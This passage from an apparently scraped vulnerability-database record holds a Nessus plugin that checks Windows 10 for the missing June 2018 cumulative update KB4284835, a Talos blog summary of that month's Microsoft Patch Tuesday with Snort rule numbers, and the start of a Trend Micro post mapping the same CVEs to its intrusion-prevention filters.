script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4284835.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the\n (Human Interface Device) HID Parser Library driver\n improperly handles objects in memory. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2018-8169)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2018-8251)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-8205)\n\n - An denial of service vulnerability exists when Windows\n NT WEBDAV Minirdr attempts to query a WEBDAV directory.\n An attacker who successfully exploited the vulnerability\n could cause a denial of service. (CVE-2018-8175)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2018-8239)\n\n - A remote code execution vulnerability exists when HTTP\n Protocol Stack (Http.sys) improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could execute arbitrary code and take\n control of the affected system. (CVE-2018-8231)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2018-8121)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8201, CVE-2018-8211, CVE-2018-8212,\n CVE-2018-8215, CVE-2018-8221)\n\n - An information disclosure vulnerability exists when\n Microsoft Edge improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8234)\n\n - An Elevation of Privilege vulnerability exists when\n Cortana retrieves data from user input services without\n consideration for status. An attacker who successfully\n exploited the vulnerability could execute commands with\n elevated permissions. (CVE-2018-8140)\n\n - A denial of service vulnerability exists in the HTTP 2.0\n protocol stack (HTTP.sys) when HTTP.sys improperly\n parses specially crafted HTTP 2.0 requests. An attacker\n who successfully exploited the vulnerability could\n create a denial of service condition, causing the target\n system to become unresponsive. (CVE-2018-8226)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8267)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8207)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2018-8233)\n\n - An elevation of privilege vulnerability exists when NTFS\n improperly checks access. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-1036)\n\n - A remote code execution vulnerability exists in Windows\n Domain Name System (DNS) DNSAPI.dll when it fails to\n properly handle DNS responses. An attacker who\n successfully exploited the vulnerability could run\n arbitrary code in the context of the Local System\n Account. (CVE-2018-8225)\n\n - A security feature bypass vulnerability exists when\n Microsoft Edge improperly handles requests of different\n origins. The vulnerability allows Microsoft Edge to\n bypass Same-Origin Policy (SOP) restrictions, and to\n allow requests that should otherwise be ignored. An\n attacker who successfully exploited the vulnerability\n could force the browser to send data that would\n otherwise be restricted. (CVE-2018-8235)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8227, CVE-2018-8229)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-0978)\n\n - An elevation of privilege vulnerability exists when\n Windows Hyper-V instruction emulation fails to properly\n enforce privilege levels. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges on a target guest operating system. The host\n operating system is not vulnerable to this attack. This\n vulnerability by itself does not allow arbitrary code to\n be run. However, the vulnerability could be used in\n conjunction with one or more vulnerabilities (e.g. a\n remote code execution vulnerability and another\n elevation of privilege) that could take advantage of the\n elevated privileges when running. The update addresses\n the vulnerability by correcting how privileges are\n enforced by Windows Hyper-V instruction emulation.\n (CVE-2018-8219)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8110,\n CVE-2018-8236)\n\n - An information disclosure vulnerability exists when Edge\n improperly marks files. An attacker who successfully\n exploited this vulnerability could exfiltrate file\n contents from disk. For an attack to be successful, an\n attacker must persuade a user to open a malicious\n website. The security update addresses the vulnerability\n by properly marking files. (CVE-2018-0871)\n\n - A denial of service vulnerability exists in the way that\n the Windows Code Integrity Module performs hashing. An\n attacker who successfully exploited the vulnerability\n could cause a system to stop responding. Note that the\n denial of service condition would not allow an attacker\n to execute code or to elevate user privileges. However,\n the denial of service condition could prevent authorized\n users from using system resources. An attacker could\n host a specially crafted file in a website or SMB share.\n The attacker could also take advantage of compromised\n websites, or websites that accept or host user-provided\n content or advertisements, by adding specially crafted\n content that could exploit the vulnerability. However,\n in all cases an attacker would have no way to force\n users to view the attacker-controlled content. Instead,\n an attacker would have to convince users to take action,\n typically via an enticement in email or instant message,\n or by getting them to open an email attachment. The\n security update addresses the vulnerability by modifying\n how the Code Integrity Module performs hashing.\n (CVE-2018-1040)\n\n - A security feature bypass vulnerability exists in\n Internet Explorer that allows for bypassing Mark of the\n Web Tagging (MOTW). Failing to set the MOTW means that a\n large number of Microsoft security technologies are\n bypassed. (CVE-2018-8113)\n\n - A remote code execution vulnerability exists when\n Windows improperly handles objects in memory. An\n attacker who successfully exploited these\n vulnerabilities could take control of an affected\n system. (CVE-2018-8210, CVE-2018-8213)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel API enforces permissions. An\n attacker who successfully exploited the vulnerability\n could impersonate processes, interject cross-process\n communication, or interrupt system functionality.\n (CVE-2018-0982)\n\n - An elevation of privilege vulnerability exists in\n Windows when Desktop Bridge does not properly manage the\n virtual registry. An attacker who successfully exploited\n this vulnerability could run arbitrary code in kernel\n mode. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2018-8208, CVE-2018-8214)\");\n # https://support.microsoft.com/en-us/help/4284835/windows-10-update-kb4284835\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7614a17f\");\n script_set_attribute(attribute:\"solution\", value:\n \"Apply Cumulative Update KB4284835.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8231\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/06/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS18-06\";\nkbs = make_list('4284835');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"17134\",\n rollup_date:\"06_2018\",\n bulletin:bulletin,\n rollup_kb_list:[4284835])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "talosblog": [{"lastseen": "2018-07-10T22:29:40", "bulletinFamily": "blog", "cvelist": ["CVE-2018-0871", "CVE-2018-0978", "CVE-2018-0982", "CVE-2018-1036", "CVE-2018-1040", "CVE-2018-8110", "CVE-2018-8111", "CVE-2018-8113", "CVE-2018-8121", "CVE-2018-8140", "CVE-2018-8169", "CVE-2018-8175", "CVE-2018-8201", "CVE-2018-8205", "CVE-2018-8207", "CVE-2018-8208", "CVE-2018-8209", "CVE-2018-8210", "CVE-2018-8211", "CVE-2018-8212", "CVE-2018-8213", "CVE-2018-8214", "CVE-2018-8215", "CVE-2018-8216", "CVE-2018-8217", "CVE-2018-8218", "CVE-2018-8219", "CVE-2018-8221", "CVE-2018-8224", "CVE-2018-8225", "CVE-2018-8226", "CVE-2018-8227", "CVE-2018-8229", "CVE-2018-8231", "CVE-2018-8233", "CVE-2018-8234", "CVE-2018-8235", "CVE-2018-8236", "CVE-2018-8239", "CVE-2018-8243", "CVE-2018-8244", "CVE-2018-8245", "CVE-2018-8246", "CVE-2018-8247", "CVE-2018-8248", "CVE-2018-8249", "CVE-2018-8251", "CVE-2018-8252", "CVE-2018-8254", "CVE-2018-8267"], "description": "## Executive Summary\n\n \nMicrosoft has released its monthly set of security advisories for vulnerabilities that have been identified and addressed in various products. This month's advisory release addresses 50 flaws, with 11 of them rated \"critical,\" and 39 rated \"important.\" These vulnerabilities impact Microsoft Edge, Internet Explorer, Chakra Scripting Engine, Windows DNSAPI, Microsoft Office, Windows Kernel and more. \n \nIn addition to the 50 vulnerabilities referenced above, Microsoft has also released a critical update advisory, ADV180014, the June 2018 Adobe Flash Security Update, which addresses the vulnerabilities described in the security bulletin. \n\n\n### Critical vulnerabilities\n\n \nThis month, Microsoft is addressing 11 vulnerabilities that are rated \"critical.\" Talos believes these three vulnerabilities in particular are notable and require prompt attention. \n \n[CVE-2018-8225 - Windows DNSAPI Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8225>) \n \nA remote code vulnerability is present within Windows DNS. This vulnerability manifests due to DNSAPI.dll improperly handling DNS responses. This vulnerability could allow a remote attacker to execute arbitrary code within the context of the LocalSystem account on affected systems. An attacker could leverage a malicious DNS server and send specially crafted DNS responses to trigger this vulnerability. \n \n[CVE-2018-8229 - Chakra Scripting Engine Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8229>) \n \nA remote code execution vulnerability is present within Microsoft Scripting Engine. This vulnerability manifests due to the Chakra engine improperly handling objects in memory. This vulnerability could be leveraged by attackers to execute arbitrary code on affected systems within the context of the current user. This vulnerability could be leveraged in web-based attacks where a user is convinced to visit a web page that has been specially crafted to exploit this vulnerability. This could be in the form of an attacker controlled webpage, or simply a page that hosts external content, such as advertisements. \n \n[CVE-2018-8267 - Scripting Engine Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8267>) \n \nA remote code execution vulnerability is present within Microsoft Scripting Engine. This vulnerability manifests due to scripting engine not properly handling objects in memory in Internet Explorer. This vulnerability could be leveraged by attackers to execute arbitrary code on affected systems within the context of the current user. This vulnerability was publicly disclosed prior to a patch being made available. \n \nOther vulnerabilities deemed \"critical\" are listed below: \n\n\n * [CVE-2018-8110 - Microsoft Edge Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8110>)\n * [CVE-2018-8111 - Microsoft Edge Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8111>)\n * [CVE-2018-8213 - Windows Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8213>)\n * [CVE-2018-8231 - HTTP Protocol Stack Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8231>)\n * [CVE-2018-8236 - Microsoft Edge Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8236>)\n * [CVE-2018-8243 - Scripting Engine Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8243>)\n * [CVE-2018-8249 - Internet Explorer Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8249>)\n * [CVE-2018-8251 - Media Foundation Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8251>)\n * [CVE-2018-8267 - Scripting Engine Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8267>)\n\n### Important vulnerabilities\n\n \nThis month, Microsoft is addressing 39 vulnerabilities that are rated \"important.\" One of these vulnerabilities is TALOS-2018-0545, which was assigned [CVE-2018-8210](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8210>). This vulnerability is a Windows remote code execution flaw that was discovered by Marcin Noga of Cisco Talos. Additional information related to this vulnerability can be found in the advisory report [here](<https://www.talosintelligence.com/reports/TALOS-2018-0545>). \n \nAdditionally, Talos believes the following vulnerability is notable and requires prompt attention. \n \n[CVE-2018-8227 - Chakra Scripting Engine Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8227>) \n \nA remote code execution vulnerability is present within the Microsoft Scripting Engine. This vulnerability manifests due to the Chakra engine improperly handling objects in memory. This vulnerability could be leveraged by attackers to execute arbitrary code on affected systems within the context of the current user. This vulnerability could be leveraged in web-based attacks where a user is convinced to visit a web page that has been specially crafted to exploit this vulnerability. This could be in the form of an attacker controlled webpage, or simply a page that hosts external content, such as advertisements. \n \nOther vulnerabilities deemed \"important\" are listed below: \n\n\n * [CVE-2018-0871 - Microsoft Edge Information Disclosure Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0871>)\n * [CVE-2018-0978 - Internet Explorer Memory Corruption Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0978>)\n * [CVE-2018-0982 - Windows Elevation of Privilege Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0982>)\n * [CVE-2018-1036 - NTFS Elevation of Privilege Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-1036>)\n * [CVE-2018-1040 - Windows Code Integrity Module Denial of Service Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-1040>)\n * [CVE-2018-8113 - Internet Explorer Security Feature Bypass Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8113>)\n * [CVE-2018-8121 - Windows Kernel Information Disclosure Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8121>)\n * [CVE-2018-8140 - Cortana Elevation of Privilege Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8140>)\n * [CVE-2018-8169 - HIDParser Elevation of Privilege Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8169>)\n * [CVE-2018-8175 - WEBDAV Denial of Service Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8175>)\n * [CVE-2018-8201 - Device Guard Code Integrity Policy Security Feature Bypass Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8201>)\n * [CVE-2018-8205 - Windows Denial of Service Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8205>)\n * [CVE-2018-8207 - Windows Kernel Information Disclosure Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8207>)\n * [CVE-2018-8208 - Windows Desktop Bridge Elevation of Privilege Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8208>)\n * [CVE-2018-8209 - Windows Wireless Network Profile Information Disclosure Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8209>)\n * [CVE-2018-8210 - Windows Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8210>)\n * [CVE-2018-8211 - Device Guard Code Integrity Policy Security Feature Bypass Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8211>)\n * [CVE-2018-8212 - Device Guard Code Integrity Policy Security Feature Bypass Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8212>)\n * [CVE-2018-8214 - Windows Desktop Bridge Elevation of Privilege Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8214>)\n * [CVE-2018-8215 - Device Guard Code Integrity Policy Security Feature Bypass Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8215>)\n * [CVE-2018-8216 - Device Guard Code Integrity Policy Security Feature Bypass Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8216>)\n * [CVE-2018-8217 - Device Guard Code Integrity Policy Security Feature Bypass Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8217>)\n * [CVE-2018-8218 - Windows Hyper-V Denial of Service Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8218>)\n * [CVE-2018-8219 - Hypervisor Code Integrity Elevation of Privilege Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8219>)\n * [CVE-2018-8221 - Device Guard Code Integrity Policy Security Feature Bypass Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8221>)\n * [CVE-2018-8224 - Windows Kernel Elevation of Privilege Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8224>)\n * [CVE-2018-8226 - HTTP.sys Denial of Service Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8226>)\n * [CVE-2018-8233 - Win32k Elevation of Privilege Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8233>)\n * [CVE-2018-8234 - Microsoft Edge Information Disclosure Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8234>)\n * [CVE-2018-8235 - Microsoft Edge Security Feature Bypass Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8235>)\n * [CVE-2018-8239 - Windows GDI Information Disclosure Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8239>)\n * [CVE-2018-8244 - Microsoft Outlook Elevation of Privilege Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8244>)\n * [CVE-2018-8245 - Microsoft Office Elevation of Privilege Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8245>)\n * [CVE-2018-8246 - Microsoft Excel Information Disclosure Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8246>)\n * [CVE-2018-8247 - Microsoft Office Elevation of Privilege Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8247>)\n * [CVE-2018-8248 - Microsoft Excel Remote Code Execution Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8248>)\n * [CVE-2018-8252 - Microsoft SharePoint Elevation of Privilege Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8252>)\n * [CVE-2018-8254 - Microsoft SharePoint Elevation of Privilege Vulnerability](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8254>)\n\n### Coverage\n\n \nIn response to these vulnerability disclosures, Talos is releasing the following Snort rules that detects attempts to exploit them. Please note that additional rules may be released in the future, and current rules are subject to change pending additional information. Firepower customers should use the latest update to their ruleset by updating their SRU. Open Source Snort Subscriber Rule Set customers can stay up-to-date by downloading the latest rule pack available for purchase on Snort.org. \n \n**Snort Rules:** \n\n\n * 45628, 46927 - 46930, 46933 - 46935, 46938 - 46945, 46951 - 46958, 46961 - 46962\n", "modified": "2018-06-19T18:44:24", "published": "2018-06-12T11:58:00", "id": "TALOSBLOG:30BC73E0EDF7739A87A63A99D8A6E0D4", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/jJACfZt8sFk/ms-tuesday.html", "type": "talosblog", "title": "Microsoft Patch Tuesday - June 2018", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "trendmicroblog": [{"lastseen": "2018-06-19T08:13:49", "bulletinFamily": "blog", "cvelist": ["CVE-2018-0871", "CVE-2018-0978", "CVE-2018-0982", "CVE-2018-1036", "CVE-2018-1040", "CVE-2018-8110", "CVE-2018-8111", "CVE-2018-8113", "CVE-2018-8121", "CVE-2018-8140", "CVE-2018-8169", "CVE-2018-8175", "CVE-2018-8201", "CVE-2018-8205", "CVE-2018-8207", "CVE-2018-8208", "CVE-2018-8209", "CVE-2018-8210", "CVE-2018-8211", "CVE-2018-8212", "CVE-2018-8213", "CVE-2018-8214", "CVE-2018-8215", "CVE-2018-8216", "CVE-2018-8217", "CVE-2018-8218", "CVE-2018-8219", "CVE-2018-8221", "CVE-2018-8224", "CVE-2018-8225", "CVE-2018-8226", "CVE-2018-8227", "CVE-2018-8229", "CVE-2018-8231", "CVE-2018-8233", "CVE-2018-8234", "CVE-2018-8235", "CVE-2018-8236", "CVE-2018-8239", "CVE-2018-8243", "CVE-2018-8244", "CVE-2018-8245", "CVE-2018-8246", "CVE-2018-8247", "CVE-2018-8248", "CVE-2018-8249", "CVE-2018-8251", "CVE-2018-8252", "CVE-2018-8254", "CVE-2018-8267"], "description": "\n\nAs a native Texan, I\u2019ve seen more than my fair share of bugs - actual physical bugs that love the hot, humid Texas climate and my curly hair for some reason. The Zero Day Initiative (ZDI) sees many bugs (of the software variety), including those that affect SCADA control systems. Fritz Sands recently walked through a deep dive into an attack on a remote procedure call (RPC) interface based on the proofs of concept from Advantech vulnerability submissions to ZDI. While Advantech\u2019s products focus on Internet of Things (IoT) and Industrial IoT, the use of RPC interfaces isn\u2019t limited to SCADA. Their use is more prevalent than you think. So if you want to get an understanding of RPC interfaces and hone your skills, you can go down the rabbit hole with Fritz and get the full details [here](<https://www.zerodayinitiative.com/blog/2018/6/7/down-the-rabbit-hole-a-deep-dive-into-an-attack-on-an-rpc-interface>).\n\n**Microsoft Security Updates**\n\nThis week\u2019s Digital Vaccine\u00ae (DV) package includes coverage for Microsoft updates released on or before June 12, 2018. This month, Microsoft released 50 security patches covering Internet Explorer (IE), Edge, ChakraCore, Hyper-V Server, Windows, and Microsoft Office and Office Services. Of the 50 CVEs, 11 are listed as Critical and 39 are rated Important. Five of the CVEs came through the ZDI program. The following table maps Digital Vaccine filters to the Microsoft updates. You can get more detailed information on this month\u2019s security updates from Dustin Childs\u2019 [June 2018 Security Update Review](<https://www.zerodayinitiative.com/blog/2018/6/12/the-june-2018-security-update-review>) from the Zero Day Initiative:\n\n**CVE #** | **Digital Vaccine Filter #** | **Status** \n---|---|--- \nCVE-2018-0871 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-0978 | 32124 | \nCVE-2018-0982 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-1036 | 32162 | \nCVE-2018-1040 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8110 | 32026 | \nCVE-2018-8111 | 32027 | \nCVE-2018-8113 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8121 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8140 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8169 | 32164 | \nCVE-2018-8175 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8201 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8205 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8207 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8208 | 32126 | \nCVE-2018-8209 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8210 | 32028 | \nCVE-2018-8211 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8212 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8213 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8214 | 32127 | \nCVE-2018-8215 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8216 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8217 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8218 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8219 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8221 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8224 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8225 | 32029 | \nCVE-2018-8226 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8227 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8229 | 32030 | \nCVE-2018-8231 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8233 | 32034 | \nCVE-2018-8234 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8235 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8236 | 32054 | \nCVE-2018-8239 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8243 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8244 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8245 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8246 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8247 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8248 | 32032 | \nCVE-2018-8249 | 32038 | \nCVE-2018-8251 | 32068 | \nCVE-2018-8252 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8254 | | Vendor Deemed Reproducibility or Exploitation Unlikely \nCVE-2018-8267 | 32065 | \n \n \n\n**Zero-Day Filters**\n\nThere are six new zero-day filters covering three vendors in this week\u2019s Digital Vaccine (DV) package. A number of existing filters in this week\u2019s DV package were modified to update the filter description, update specific filter deployment recommendation, increase filter accuracy and/or optimize performance. You can browse the list of [published advisories](<http://www.zerodayinitiative.com/advisories/published/>) and [upcoming advisories](<http://www.zerodayinitiative.com/advisories/upcoming/>) on the [Zero Day Initiative](<http://www.zerodayinitiative.com/>) website. You 